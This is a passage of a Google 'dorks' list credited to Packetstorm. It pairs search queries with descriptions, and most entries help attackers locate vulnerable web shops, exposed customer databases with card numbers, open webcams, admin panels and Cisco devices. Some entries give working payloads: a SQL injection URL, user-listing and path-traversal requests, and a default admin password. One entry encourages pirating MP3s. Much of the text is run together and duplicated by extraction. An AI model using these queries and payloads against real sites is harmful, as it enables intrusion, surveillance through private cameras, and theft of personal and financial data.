MetaCart is an ASP based shoppingCart application with SQL database. Asecurity vulnerability in the free demoversion of the product (MetaCartFree)allows attackers to access the databaseused for storing user provided data(Credit cart numbers, Names,Surnames, Addresses, E-mails, etc).

inurl:midicart.mdb inurl:midicart.mdb

MIDICART is s an ASP and PHPbased shopping Cart application withMS Access and SQL database. Asecurity vulnerability in the productallows remote attackers to downloadthe product's database, thus gain accessto sensitive information about users ofthe product (name, surname, address,e-mail, phone number, credit cardnumber, and company name).

Page 103: Packetstorm Google Dorks List

camera linksysinurl:main.cgi camera linksys inurl:main.cgi Another webcam, Linksys style.

intitle:"MailManLogin" intitle:"MailMan Login"

MailMan is a product by Endymioncorporation that provides a web basedinterface to email via POP3 and SMTP.MailMan is very popular due to itsamazingly easy setup and operation.MailMan is written as a Perl CGIscript, the version that is shipped tocustomers is obfuscated in an attemptto prevent piracy. The code containsseveral insecure calls to open()containing user specified data. Thesecalls can be used to execute commandson the remote server with thepermissions of the user that runs CGIscripts, usually the web server user thatis in most cases 'nobody'.

intitle:"mywebcamXPserver!"inurl:":8080"

intitle:"my webcamXP server!"inurl:":8080"

"my webcamXP server!"Is there reallyan explantation needed?

(inurl:webArch/mainFrame.cgi ) |(intitle:"webimage monitor" -htm -solutions)

(inurl:webArch/mainFrame.cgi ) |(intitle:"web image monitor" -htm -solutions)

The Ricoh Aficio 2035 (fax/scanner)web interface.Attackers may read faxesand can get information like internal ipaddresses.cleanup by: yeseins &golfocleanup date: Apr 28,2005original dork:inurl:webArch/mainFrame.cgi

"Powered byFUDforum" "Powered by FUDforum"

FUDforum is a forums package. It usesa combination of PHP & MySQL tocreate a portable solution that can runon virtually any operating system.FUDforum has two security holes thatallow people to download ormanipulate files and directories outsideof FUDforum's directories. One of theholes can be exploited by everyone,while the other requires administratoraccess. The program also has someSQL Injection problems.http://www.securityfocus.com/bid/5501

"BosDates "BosDates Calendar System " "BosDates is a flexible calendar system

Page 104: Packetstorm Google Dorks List

Calendar System ""powered byBosDates v3.2 byBosDev"

"powered by BosDates v3.2 byBosDev"

which allows for multiple calendars,email notifications, repeating eventsand much more. All of which are easilymaintained by even the least technicalusers." There is a vulnerability inBosDates that allows an attacker todisclose sensitive information via SQLinjection.

intitle:"LotusDomino GoWebserver:""Tuning yourwebserver" -site:ibm.com

intitle:"Lotus Domino GoWebserver:" "Tuning yourwebserver" -site:ibm.com

Domino Go Webserver is a scalablehigh-performance Web server that runson a broad range of platforms. DominoGo Webserver brings you state-of-the-art security, site indexing capabilities,and advanced server statisticsreporting. With Domino GoWebserver, you can speed beyond yourcompetition by exploiting the latestadvances in technology, such as Java,HTTP 1.1, and Web site content rating.Get all this and more in a Web serverthat's easy to install and maintain. --From the Lotus Domino Go Webserverweb pag

intitle:"error 404""From RFC 2068 "

intitle:"error 404" "From RFC 2068"

WebLogic Server Process Editionextends the functionality of theApplication Server by convergingcustom app development with powerfulBusiness Process Management (BPM)capabilities to provide an industrialstrength, standards-based frameworkthat enables the rapidly assembly ofcomposite services, transformingexisting infrastructure to a serviceoriented architecture-in a manageablephased approach.

intitle:"OpenWebMail" "OpenWebMail version(2.20|2.21|2.30) "

intitle:"Open WebMail" "OpenWebMail version (2.20|2.21|2.30) "

"Open WebMail is a webmail systembased on the Neomail version 1.14from Ernie Miller. Open WebMail isdesigned to manage very large mailfolder files in a memory efficient way.It also provides a range of features tohelp users migrate smoothly fromMicrosoft Outlook to Open WebMail".A remote attacker can run arbitrarycommands with the web server's

Page 105: Packetstorm Google Dorks List

privileges by exploiting an unfilteredparameter in userstat.pl. DetailsVulnerable Systems: * Open Webmailversions 2.20, 2.21 and 2.30 * Limitedexploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below) The vulnerabilitywas discovered in an obsolete scriptnamed userstat.pl shipped with OpenWebmail. The script doesn't properlyfilter out shell characters from theloginname parameter. The loginnameparameter is used as an argument whenexecuting openwebmail-tool.pl fromthe vulnerable script. By adding a ";","|" or "( )" followed by the shellcommand to a http GET, HEAD orPOST request an attacker can executearbitrary system commands as anunprivileged user (the Apache user,"nobody" or "www", e.g.).

intitle:"EMUMAIL - Login""Powered by EMUWebmail"

intitle:"EMUMAIL - Login""Powered by EMU Webmail"

The failure to strip script tags inemumail.cgi allows for XSS type ofattack. Vulnerable systems: * EMUWebmail version 5.0 * EMU Webmailversion 5.1.0 Depending on whatfunctions you throw in there, you getcertain contents of the emumail.cgi file.The vulnerability was discovered in anobsolete script named userstat.plshipped with Open Webmail. Thescript doesn't properly filter out shellcharacters from the loginnameparameter.http://www.securityfocus.com/bid/9861

intitle:"WebJeff -FileManager"intext:"login"intext:Pass|PAsse

intitle:"WebJeff - FileManager"intext:"login" intext:Pass|PAsse

WebJeff-Filemanager 1.xDESCRIPTION: A directory traversalvulnerability has been identified inWebJeff-Filemanager allowingmalicious people to view the contentsof arbitrary files. The problem is thatthe "index.php3" file doesn't verify thepath to the requested file. Access tofiles can be done without authorisation.

Page 106: Packetstorm Google Dorks List

http://www.securityfocus.com/bid/7995

inurl:netw_tcp.shtml inurl:netw_tcp.shtml

An Axis Network Camera captures andtransmits live images directly over anIP network (e.g.LAN/intranet/Internet), enabling usersto remotely view and/or manage thecamera from a Web browser on anycomputer [..]

intitle:"Object notfound!"intext:"Apache/2.0.* (Linux/SuSE)"

intitle:"Object not found!"intext:"Apache/2.0.* (Linux/SuSE)"

This one detects apache werbservers(2.0.X/SuSE) with its error page.

inurl:"messageboard/Forum.asp?" inurl:"messageboard/Forum.asp?"

Multiple vulnerabilities have beenfound in GoSmart Message Board. Aremote user can conduct SQL injectionattack and Cross site scripting attack.http://www.securityfocus.com/bid/11361

intitle:"DirectoryListing" "treeview"

intitle:"Directory Listing" "treeview"

Dirlist is an ASP script that list foldersin an explorer style: * Tree * Detailed* Tiled Quote: *Lists files anddirectories in either a Tree, Detailed, orTiled view. *Can set a "StartingDirectory". This can be a IIS VirtualDirectory path. *Displays file anddirectory properties. *Can specifydirectories which you do not want todisplay and access. *Can specifydirectories which you only want todisplay and access. *Can specify whatfile-types to only display. *Displayscustom file-type icons. This can beturned off in the settings. * 'Detailed'and 'tiled' views display a Breadcrumbbar for easier navigation. This can beturned off in the settings.

inurl:default.aspintitle:"WebCommander"

inurl:default.aspintitle:"WebCommander"

Polycom WebCommander gives youcontrol over all aspects of setting upconferences on Polycom MGC MCUs.With Polycom WebCommander,scheduling and launching multipointconferences, ad hoc meetings or futureconferences is an easy, productive way

Page 107: Packetstorm Google Dorks List

to schedule meetings.

intitle:"Philex0.2*" -script -site:freelists.org

intitle:"Philex 0.2*" -script -site:freelists.org

Philex (phile 'file' explorer) is a webcontent manager based php what philexcan do ? - easy navigation with treestructure - create, delete, rename, copyand move folders/files. - downloadfiles (normal or compressed :zip, gz, bz). - download many files as onecompressed file. - send files by email. -upload local files to server

intitle:mywebftp"Please enter yourpassword"

intitle:mywebftp "Please enter yourpassword"

MyWebFTP Free is a free lite versionof MyWebFTP Personal - a PHP scriptproviding FTP client capabilities withthe user interface in your browser.Install it on a remote server and easilyconnect to your FTP servers through afirewall or a proxy not allowing FTPconnections. No PHP built-in FTPsupport is required. Perform actions onmany files at once. Password protectedfrom casual surfers wasting yourbandwidth. Nice look and feel is easycustomizable.

"1999-2004FuseTalk Inc" -site:fusetalk.com

"1999-2004 FuseTalk Inc" -site:fusetalk.com

Fusetalk forums (v4) are susceptible tocross site scripting attacks that can beexploited by passing a img src withmalicious javascript.

"2003 DUware AllRights Reserved"

"2003 DUware All RightsReserved"

Multiple vulnerabilities have beenidentified in the software that mayallow a remote attacker to carry outSQL injection and HTML injectionattacks. An attacker may also gainunauthorized access to a user's account.DUclassmate may allow unauthorizedremote attackers to gain access to acomputer. DUclassified is reportedprone to multiple SQL injectionvulnerabilities. SQL injection issuesalso affect DUforum. DUclassified andDUforum are also reported vulnerableto various unspecified HTML injectionvulnerabilities.

"WebExplorerServer - Login"

"WebExplorer Server - Login""Welcome to WebExplorer Server"

WebExplorer Server is a web-basedfile management system for sharing

Page 108: Packetstorm Google Dorks List

"Welcome toWebExplorerServer"

files with user permissions and quotalimits. It features easy user interfaceand online administration which willallow you to manageusers/groups/permissions without theneed of server configurationknowledge. It can be used for remotefile storage(eg FreeDrive)/hostingservices, Companies/Educationalinstitutions that need to sharedocuments among people.

intitle:"ASP StatsGenerator *.*""ASP StatsGenerator" "2003-2004 weppos"

intitle:"ASP Stats Generator *.*""ASP Stats Generator" "2003-2004weppos"

ASP Stats Generator is a powerful ASPscript to track web site activity. Itcombines a server side sniffer with ajavascript system to get informationabout clients who are visiting your site.

"Installed ObjectsScanner"inurl:default.asp

"Installed Objects Scanner"inurl:default.asp

Installed Objects Scanner makes it easyto test your IIS Webserver for installedcomponents. Installed Objects Scanneralso has descriptions and links formany components to let you knowmore on how using those components.Just place the script on your server andview it in your browser to check yourserver for all currently knowncomponents.

intitle:"remoteassessment"OpenAanvalConsole

intitle:"remote assessment"OpenAanval Console

The Aanval Intrusion DetectionConsole is an advanced intrusiondetection monitor and alerting system.Currently supporting modules for Snortand syslog - Aanval provides real-timemonitoring, reporting, alerting andstability. Aanval's web-browserinterface provides real-time eventviewing and system/sensormanagement.

ext:iniintext:env.ini ext:ini intext:env.ini

This one shows configuration files forvarious applications. based on theapplication an attacker may findinformation like passwords,ipaddresses and more.

ezBOO"AdministratorPanel" -cvs

ezBOO "Administrator Panel" -cvsezBOO WebStats is a high levelstatistical tool for web sites monitoring.It allows real time access monitoring

Page 109: Packetstorm Google Dorks List

on several sites. Based on php andmySQL it is easy to install andcustomization is made easy. It workson Unix, Linux and Windows

"This page hasbeen automaticallygenerated by PleskServerAdministrator"

"This page has been automaticallygenerated by Plesk ServerAdministrator"

Plesk Server Administrator (PSA) isweb based software that enables remoteadministration of web servers. It can beused on Linux and other systems thatsupport PHP. Due to an inputvalidation error in Plesk ServerAdministrator, it is possible for aremote attacker to make a speciallycrafted web request which will displayPHP source code. This is acheivable byconnecting to a host (using the IPaddress rather than the domain name),and submitting a request for a knownPHP file along with a valid username.http://www.securityfocus.com/bid/3737

"The script whoseuid is " "is notallowed to access"

"The script whose uid is " "is notallowed to access"

This PHP error message is revealingthe webserver's directory and user ID.

filetype:phpinurl:nqtintext:"NetworkQuery Tool"

filetype:php inurl:nqtintext:"Network Query Tool"

Network Query Tool enables anyInternet user to scan networkinformation using:* Resolve/ReverseLookup* Get DNS Records* Whois(Web)* Whois (IP owner)* Check port(!!!)* Ping host* Traceroute to host*Do it allThe author has been informedthat the nqt form also accepts inputfrom cross site pages, but he will notfix it.A smart programmer could usethe port scan feature and probe al thenmap services ports. Though thiswould be slow, but it provides a higherdegree of anonymity, especially if theattacker is using a proxy or an InternetCafe host to access the NQT pages.Itgets even worse .. an attacker can scanthe *internal* hosts of the networksthat host NQT in many cases. Verydangerous.PS: this vulnerability wasfound early this year (search google forthe full report), but was never added to

Page 110: Packetstorm Google Dorks List

the GHDB for some reason.

inurl:TiVoConnect?Command=QueryServer

inurl:TiVoConnect?Command=QueryServer

Tivo is a the digital replacement foryour analog videorecorder. It's a digitalmedia system that amongst other thingsallows recording tv shows to a harddisk. More information is available athttp://www.tivo.com.This search wasfound in one of those cgi scanningtools out there. Currently there are onlytwo results and only the first respondswith information like this:1.0Sat Oct16 15:26:46 EDT2004JavaHMO1.0Leon Nicholls-Thisis an official build. Identifier:2003.03.25-1612 Last Change:112792In the future vulnerabilities maybe found in this software. For now anattacker can enjoy the mp3 stream itprovides (copy the server:port inwinamp or xmms).

ext:mdbinurl:*.mdbinurl:fpdbshop.mdb

ext:mdb inurl:*.mdb inurl:fpdbshop.mdb

The directory "http:/xxx/fpdb/" is thedatabase folder used by some versionsof FrontPage. It contains many types ofMicrosoft Access databases.One ofthem is Metacart, who used"shop.mdb" as their default name. Itcontains customer info like phonenumbers but also plain text passwords.A screenshot is available atImageShack:http://img49.exs.cx/img49/7673/shopmdb.jpgThree results only at time ofwriting. Remove the shop.mdb part tosee the complete list of databases.

inurl:cgi-bin/testcgi.exe"Please distributeTestCGI"

inurl:cgi-bin/testcgi.exe "Pleasedistribute TestCGI"

Test CGI by Lilikoi Software aids inthe installation of the Ceilidhdiscussion engine for the World WideWeb. An attacker can use this to gatherinformation about the server like:Operating System, IP and the fulldocroot path.

inurl:ttt-webmaster.php inurl:ttt-webmaster.php

Turbo traffic trader Nitro v1.0 is a free,fully automated traffic trading script.Multiple vulnerabilities werefound.Vulnerability report:

Page 111: Packetstorm Google Dorks List

http://www.securityfocus.com/bid/11358Vendor site:http://www.turbotraffictrader.com/php

intitle:"DVR Webclient" intitle:"DVR Web client"

This embedded DVR is quick plug andplay. Just plug it in and it will startrecording. You can view all thecameras at once or one at a time.Allows individual pictures to come upon play back or all together. The bestfeature is the ability to connect via anetwork and play back existing storedvideo or view images live.* FourChannel Input* Horizontal Resolution480 Lines* 16.7 Million Color Output*Display In Quad or Single Image (FullMultiPlex)* Motion Detection*Scheduling* Zoom in Live andPlayback* 720H X 480V (Full) 360HX 240V In Quad* 0.1 FPS Thru 15FPS each camera (60 FPS Total)* WebInterface TCP/IP With ClientSoftware* Back-Up With Mark Image,VCR, Time Lapse, Remote ClientSoftware* Full Remote CameraControls (PTZ), Alarms, Wiper, Fans,Etc.

intitle:"ASPFileMan" Resend -site:iisworks.com

intitle:"ASP FileMan" Resend -site:iisworks.com

FileMan is a corporate web basedstorage and file management solutionfor intra- and internet. It runs onMicrosoft IIS webservers and is writtenin ASP. All user and group settings arestored in a MS Access or SQLdatabase. Default user: user=admin,pass=passIn the default installation adiagnostigs page calleddiags.asp existsthe manual recommends to delete it,but it can be found in some installs.The path to the database is also on thepage. If the server is not configuredcorrectly, the mdb file can bedownloaded and the passwords are notencrypted.Site admins have beennotified. As always: DO NOT ABUSETHIS.

intitle:"Directory intitle:"Directory Listing For" The Google Hackers Guide explains

Page 112: Packetstorm Google Dorks List

Listing For"intext:Tomcat -intitle:Tomcat

intext:Tomcat -int how to find Apache directory indexes,which are the most common found onthe Internet. There are other wayshowever.This query is a generic searchfor servers using Tomcat with directorylistings enabled. They are a bit morefancy than Apache's default lists andmore importantly they will not befound using "index.of".

site:.viewnetcam.com -www.viewnetcam.com

site:.viewnetcam.com -www.viewnetcam.com

The FREE viewnetcam.com serviceallows you to create a personal webaddress (e.g.,http://bob.viewnetcam.com) at whichyour camera's live image can be foundon the Internet. How the camera andservice works: Special Softwareembedded within your PanasonicNetwork Camera gives your camera theability to locate your unique Internetaddress. No matter what kind ofInternet connection you have or whichInternet provider you use, theviewnetcam.com service will keep yourcamera's Internet address permanent.

inurl:/cgi-bin/finger? Enter(account|host|user|username)

inurl:/cgi-bin/finger? Enter(account|host|user|username)

The finger command on unix displaysinformation about the system users.This search displays the webinterfacefor that command.

inurl:/cgi-bin/finger? "In reallife"

inurl:/cgi-bin/finger? "In real life"

The finger command on unix displaysinformation about the system users.This search displays pre-fingered users,so an attacker wouldn't even have toguess their accounts.

inurl:"calendar.asp?action=login" inurl:"calendar.asp?action=login"

aspWebCalendar is a browser basedsoftware package that runs over astandard web browser, such as InternetExplorer from Microsoft, and allows anorganization of any size to easily andcost effectively provide personal andgroup calendar functions to everyone inthe organization.A vulnerability hasbeen found for the (SQL version) scriptfamily from Full Revolution. Affectedsoftware is: aspWebAlbum,aspWebCalendar, aspWebHeadlines,

Page 113: Packetstorm Google Dorks List

aspWebMail. You can check it here:http://www.securityfocus.com/bid/11246Searches for aspWebAlbum andaspWebHeadlines:inurl:"album.asp?action=login"inurl:"news.asp?action=login"

"Powered byCubeCart" "Powered by CubeCart"

--------------------------------------------------------Full path disclosure and sqlinjection on CubeCart 2.0.1--------------------------------------------------------[1]Introduction[2]The Problem[3]TheSolution[4]Timeline[5]Feddback##############################################################[1]Introduction"CubeCart is an eCommercescript written with PHP & MySQL.With CubeCart you can setup apowerful online store as long asyouhave hosting supporting PHP andone MySQL database."This info wastaken fromhxxp://www.cubecart.comCubeCart,from Brooky(hxxp://www.brooky.com), is asoftware formerly known aseStore.[2]The ProblemA remote usercan cause an error in index.php usingthe parameter 'cat_id' which is notproperly validated, displayingthesoftware's full installation path. Itcan also be used to inject sqlcommands. Examples follow:(a)http://example.com/store/index.php?cat_id='causes an error like this:"Warning:mysql_fetch_array(): suppliedargument is not a valid MySQL resultresourcein/home/example/public_html/store/link_navi.php on line 35Warning:mysql_num_rows(): supplied argumentis not a valid MySQL result resourcein/home/example/public_html/store/index.php on line 170Warning:mysql_fetch_array(): suppliedargument is not a valid MySQL resultresource

Page 114: Packetstorm Google Dorks List

in/home/example/public_html/store/index.php on line 172"(b)http://example.com/store/index.php?cat_id=1 or 1=1--displays all categories inthe database[3]The SolutionNone atthis time.Vendor contacted and fix willbe avaliablesoon.[4]Timeline(2/10/2004)Vulnerability discovered(2/10/2004)Vendor notified(3/10/2004) Vendorresponse[5]FeedbackComments andstuff to [email protected]

inurl:confixxinurl:login|anmeldung

inurl:confixx inurl:login|anmeldung

Confixx is a webhosting managementtool and has the following features: *create resellers, * edit personal data, *manage newsletters to resellers, *comprehensive stats, * powerfulevaluation of traffic, * manage e-mailtemplates, * lock resellers. securityfocus has a vulnerability report onthis.vendor: http://www.sw-soft.com/en/products/confixx/

"VHCS Pro ver" -demo "VHCS Pro ver" -demo

VHCS is professional Control PanelSoftware for Shared, Reseller, vServerand Dedicated Servers.Novulnerabilities are reported to securityfocus.

intitle:"VirtualServerAdministrationSystem"

intitle:"Virtual ServerAdministration System"

VISAS, German control panel softwarelike confixx.No vulnerabilities arereported to security focus.

"SysCP - login" "SysCP - login"

sysCP: Open Source servermanagement tool for Debian LinuxNovulnerabilities are reported to securityfocus.

intitle:"ISPMan :UnauthorizedAccess prohibited"

intitle:"ISPMan : UnauthorizedAccess prohibited"

ISPMan is a distributed system tomanage components of ISP from acentral management interface.Novulnerabilities are reported to securityfocus.

"Login - SunCobalt RaQ" "Login - Sun Cobalt RaQ"

The famous Sun linux appliance. Niceclean portal search.Variousvulnerabilities are reported to securityfocus.

Page 115: Packetstorm Google Dorks List

"OPENSRSDomainManagement"inurl:manage.cgi

"OPENSRS Domain Management"inurl:manage.cgi

OpenSRS Domain ManagementSystemNo vulnerabilities are reportedto security focus.

intitle:pleskinurl:login.php3 intitle:plesk inurl:login.php3

Plesk is server management softwaredeveloped for the Hosting ServiceIndustry. Various vulnerabilities arereported to security focus.

inurl:"level/15/exec/-/show" inurl:"level/15/exec/-/show"

This search finds Cisco devices whichhave level 15 access open viawebinterface. If an attacker wants tosearch for another level he can replacethe "15" with this level. Levels below10 need a leading zero (e.g.04).Currently only the cached pagescan be viewed.

inurl:/dana-na/auth/welcome.html

inurl:/dana-na/auth/welcome.html

Neoteris Instant Virtual Extranet (IVE)has been reported prone to a cross-sitescripting vulnerability.The issuepresents itself, due to a lack ofsufficient sanitization performed on anargument passed to an IVE CGI script.An attacker may exploit thisvulnerability to hijack valid NeoterisIVE sessions.advisories:http://secunia.com/product/1558/http://www.securityfocus.com/bid/7510

inurl:login.php"SquirrelMailversion"

inurl:login.php "SquirrelMailversion"

squirrelMail is a standards-basedwebmail package written in PHP4. Itincludes built-in pure PHP support forthe IMAP and SMTP protocols, and allpages render in pure HTML 4.0 (withno JavaScript required) for maximumcompatibility across browsers. It hasvery few requirements and is very easyto configure and install. SquirrelMailhas all the functionality you wouldwant from an email client, includingstrong MIME support, address books,and folder manipulation.

"Ideal BB Version:0.1" -idealbb.com

"Ideal BB Version: 0.1" -idealbb.com

Ideal BB has been a popular choice forpowering web based bulletin boardsand we are now proud to introduce ournext generation bulletin board Ideal

Page 116: Packetstorm Google Dorks List

BB.NET. Ideal Science IdealBB isreported prone to multiple unspecifiedinput validation vulnerabilities. Theseissues result from insufficientsanitization of user-supplied data.Securityfocus currently has 3 reportsidealBB.

(inurl:81/cgi-bin/.cobalt/) |(intext:"Welcometo the CobaltRaQ")

(inurl:81/cgi-bin/.cobalt/) |(intext:"Welcome to the CobaltRaQ")

The famous Sun linux appliance. Thedefault page displays thistext:"Congratulations on Choosing aCobalt RaQ - the premier serverappliance platform for web hosting.This page can easily be replaced withyour own page. To replace this page,transfer your new content to thedirectory /home/sites/home/web".

"Powered byYaPig V0.92b" "Powered by YaPig V0.92b"

YaPiG is reported to contain an HTMLinjection vulnerability. The problem isreported to present itself due to a lackof sanitization performed on certainfield data.This may allow an attacker toinject malicious HTML and script codeinto theapplication.http://www.securityfocus.com/bid/11452

intitle:"toshibanetwork camera -User Login"

intitle:"toshiba network camera -User Login"

Web interface of Toshiba networkcameras.

inurl:"/site/articles.asp?idcategory="

inurl:"/site/articles.asp?idcategory="

Dwc_Articles is an ASP applicationdesigned to add Featured, Recent andPopular News through an easy to useadministration area. Other features:Design Packages, Add, Modify,Deactive through HTML/WysiwygEditor, Nearly all scripts suffer frompossible sql injections.http://www.securityfocus.com/bid/11509

index.of.dcim index.of.dcim

The DCIM directory is the defaultname for a few brands of digitalcamers. This is not a big networksecurity risk, but like netcams it canreveal juicy details if found oncorporate intranets.

Page 117: Packetstorm Google Dorks List

intitle:"phpremoteview" filetype:php"Name, Size,Type, Modify"

intitle:"phpremoteview"filetype:php "Name, Size,

phpRemoteView is webbasedfilemanger with a basic shell. With thisan attacker can browse the serverfilesystem use the online phpinterpreter.vendor:http://php.spb.ru/remview/ (russian)

intitle:"index of" -inurl:htm -inurl:html mp3

intitle:"index of" -inurl:htm -inurl:html mp3

Yes! I probably have should have toldyou guys earlier, but this is how ivebeen getting 100% of my mp3s. Itfricken rocks, use it and abuse it.Downfalls to it... a)sometimes youshouldnt include mp3 in the query andgetting what you want takes severaldifferent methods of searching b)a lotof the time google gives you resultsand they are not there thanks to goodold friend 404 c)finding stuff takes alot of practice. Goods... a)ive foundwhole albums b)ive mass downloadeddirectories of hundreds of songs that ihave intrest in c)its exciting seeing theresults, like fining treasure.

intitle:"Index of"upload size parentdirectory

intitle:"Index of" upload size parentdirectory

Files uploaded through ftp by otherpeople, sometimes you can find allsorts of things from movies toimportant stuff.

filetype:cgiinurl:nbmember.cgi

filetype:cgi inurl:nbmember.cgi

vulnerable Netbillingnbmember.cgiNetbilling'nbmember.cgi' script is reported proneto an information disclosurevulnerability. This issue may allowremote attackers to gain access to userauthentication credentials andpotentially sensitive configurationinformation.The following proof ofconcept isavailable:http://www.example.com/cgi-bin/nbmember.cgi?cmd=testhttp://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeywordhttp://www.securityfocus.com/bid/11504

"Powered byCoppermine PhotoGallery"

"Powered by Coppermine PhotoGallery"

published Oct 20, 2004, updated Oct20, 2004vulnerable:Coppermine PhotoGallery Coppermine Photo Gallery

Page 118: Packetstorm Google Dorks List

1.0Coppermine Photo GalleryCoppermine Photo Gallery1.1Coppermine Photo GalleryCoppermine Photo Gallery1.2Coppermine Photo GalleryCoppermine Photo Gallery1.2.1Coppermine Photo GalleryCoppermine Photo Gallery1.3Coppermine Photo GalleryCoppermine Photo Gallery1.3.1Coppermine Photo GalleryCoppermine Photo Gallery1.3.2Coppermine Photo Gallery isreported prone to a design error thatmay allow users to cast multiple votesfor a picture.All versions ofCoppermine Photo Gallery areconsidered vulnerable at themoment.http://www.securityfocus.com/bid/11485

"Powered byWowBB" -site:wowbb.com

"Powered by WowBB" -site:wowbb.com

WowBB is reportedly affected bymultiple input validationvulnerabilities. These issues are due toa failure of the application to properlysanitize user-supplied input prior toincluding it in dynamic web contentand SQL database queries.An attackercan leverage these issues to manipulateor reveal database contents throughSQL injection attacks as well as carryout other attacks and steal cookie-basedauthentication credentials throughcross-site scriptingattacks.http://www.securityfocus.com/bid/11429http://www.wowbb.com/

"Powered byocPortal" -demo -ocportal.com

"Powered by ocPortal" -demo -ocportal.com

Reportedly ocPortal is affected by aremote file include vulnerability. Thisissue is due to a failure of theapplication to sanitize user suppliedURI input.An attacker might leveragethis issue to run arbitrary server sidescript code on a vulnerable computerwith the privileges of the web serverprocess. This may potentially result ina compromise of the vulnerable

Page 119: Packetstorm Google Dorks List

computer as well as otherattacks.http://www.securityfocus.com/bid/11368

inurl:"slxweb.dll" inurl:"slxweb.dll"

salesLogix is the CustomerRelationship Management solutionthatdrives sales performance in small tomedium-sized businesses throughSales, Marketing, and CustomerSupport automation and back-officeintegration.The problem:Bymanipulating the cookies used by theWeb Client, it is possible totrick theserver into authenticating a remote useras the CRM administrator withoutrequiring a password. It is also possibleto perform SQL injection attacks on theSQL serverthat is used as the data storefor the SalesLogix CRM system, revealdetailed error reports contained inHTTP headers and disclose the realfilesystem paths to various SalesLogixdirectories. The SalesLogix serveritself is vulnerable to an attack thatwouldallow a malicious user to obtainthe username and password used toaccess the SQL server used as a datastore. The disclosed username andpassword always have read/writepermissions on the database. Anothervulnerability in the SalesLogix serverallows anunauthenticated user toupload arbitrary files to the server inany directory (s)hechooses.http://www.securityfocus.com/bid/11450

"Powered byDMXReady SiteChassis Manager"-site:dmxready.com

"Powered by DMXReady SiteChassis Manager" -site:dmxready.com

It is reported that DMXReady SiteChassis Manager is susceptible to tworemotely exploitable input validationvulnerabilities. These vulnerabilitiesare due to a failure of the application toproperly sanitize user-supplieddata.The first issue is an unspecifiedcross-site scripting vulnerability. Thisissue could permit a remote attacker tocreate a malicious URI link that

Page 120: Packetstorm Google Dorks List

includes hostile HTML and script code.If this link were to be followed, thehostile code may be rendered in theweb browser of the victim user. Thiswould occur in the security context ofthe affected web site and may allow fortheft of cookie-based authenticationcredentials or other attacks.The secondissue is an unspecified SQL injectionvulnerability. It may be possible for aremote user to inject arbitrary SQLqueries into the underlying databaseused by the application. This couldpermit remote attackers to passmalicious input to database queries,resulting in modification of query logicor other attacks.Successful exploitationcould result in compromise of theapplication, disclosure or modificationof data or may permit an attacker toexploit vulnerabilities in the underlyingdatabase implementation.

"Powered by MyBlog"intext:"FuzzyMonkey.org"

"Powered by My Blog"intext:"FuzzyMonkey.org"

FuzzyMonkey My Blog is vulnerableto multiple input validationvulnerabilities. These issues are causedby a failure to validate and filter user-supplied strings before including themin dynamic Web page content.Anattacker could leverage these issues tocarry out cross-site scripting attacksagainst unsuspecting users, facilitatingtheft of cookie-based authenticationcredentials as well as otherattacks.vulnerable FuzzyMonkey MyBlog 1.15FuzzyMonkey My Blog1.16FuzzyMonkey My Blog1.17FuzzyMonkey My Blog1.18FuzzyMonkey My Blog1.19FuzzyMonkey My Blog 1.20notvulnerable FuzzyMonkey My Blog1.21 They also have several otherscripts, which may or may not bevulnerable. But remember Murphy'slaw also applies to software writers.#My Photo Gallery (picture and filesharing software)# My Calendar (quick

Page 121: Packetstorm Google Dorks List

and easy web calendar)# My VotingScript# MyGuestbookhttp://www.securityfocus.com/bid/11325

inurl:wiki/MediaWiki inurl:wiki/MediaWiki

MediaWiki is reported prone to across-site scripting vulnerability. Thisissue arises due to insufficientsanitization of user-supplied data. Aremote attacker may exploit thisvulnerability to execute arbitraryHTML and script code in the browserof a vulnerable user.bugtraq id11480objectclass Input ValidationErrorcve CVE-MAP-NOMATCHremote YeslocalNopublished Oct 18, 2004updated Oct20, 2004vulnerable MediaWikiMediaWiki 1.3MediaWiki MediaWiki1.3.1MediaWiki MediaWiki1.3.2MediaWiki MediaWiki1.3.3MediaWiki MediaWiki1.3.4MediaWiki MediaWiki1.3.5MediaWiki MediaWiki 1.3.6notvulnerable MediaWiki MediaWiki1.3.7

"inurl:/site/articles.asp?idcategory="

"inurl:/site/articles.asp?idcategory="

Dwc_Articles, is an ASP applicationdesigned to add Featured, Recent andPopular News through an easy to useadministration area. Other features:Design Packages, Add, Modify,Deactive through HTML/WysiwygEditor, Upload, categories, MultipleUsers and more.Nearly all scriptssuffer from possible sql injections. Thismay lead an attacker to changewebsites content or even worse, a loginas an admin.vulnerable:

"Enter ip"inurl:"php-ping.php"

"Enter ip" inurl:"php-ping.php"

It has been reported that php-ping maybe prone to a remote commandexecution vulnerability that may allowremote attackers to execute commandson vulnerable systems. The problemexists due to insufficient sanitization ofshellmetacharacters via the 'count'parameter of php-ping.php

Page 122: Packetstorm Google Dorks List

script.report:http://www.securityfocus.com/bid/9309/info/sample:http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg

"File UploadManager v1.3""rename to"

"File Upload Manager v1.3""rename to"

thepeak file upload manager let youmanage your webtree with up anddownloading files.

inurl:click.phpintext:PHPClickLog

inurl:click.php intext:PHPClickLog

A script written in PHP 4 which logs auser's statistics when they click on alink. The log is stored in a flatfile (text)database and can be viewed/inspectedthrough an administration section.

intitle:welcome.to.horde intitle:welcome.to.horde

Horde Mail is web based emailsoftware, great for checking messageson the road. Several vulnerabilitieswere reported to Security Focus.

intitle:"AppServOpen Project" -site:www.appservnetwork.com

intitle:"AppServ Open Project" -site:www.appservnetwork.com

AppServ is the Apache/PHP/MySQLopen source software installerpackages. This normally includesconvenient links to phpMyAdmin andphpInfo() pages.

"powered byYellDL" "powered by YellDL"

Finds websites using YellDL (or alsoknown as YellDownLoad), a downloadtracker written in PHP. Unfortunatelythis downloader downloads everythingyou want to, like its own filestoo:http://xxxxxxxxxx/download.php?f=../download&e=phpBy guessing somecould download information whichshoudln't get out of the server (think of../phpMyAdmin/config.php or otherstuff - no need to say that lazy peopleuse same passwords for their DB- andFTP-login.Another search to find thissoftware is:"You are downloading *""you are downloader number * of thisfile"

intitle:"index of"intext:"content.ie5"

intitle:"index of"intext:"content.ie5"

This dork indicates the "Local settings"dir in most cases, and browseble serverdirectories in general.

intitle:"phpicalendaradministration" -

intitle:"php icalendaradministration" -site:sourceforge.net

PHP iCalendar is a php-based iCal fileparser. Its based on v2.0 of the IETFspec. It displays iCal files in a nice

Page 123: Packetstorm Google Dorks List

site:sourceforge.net

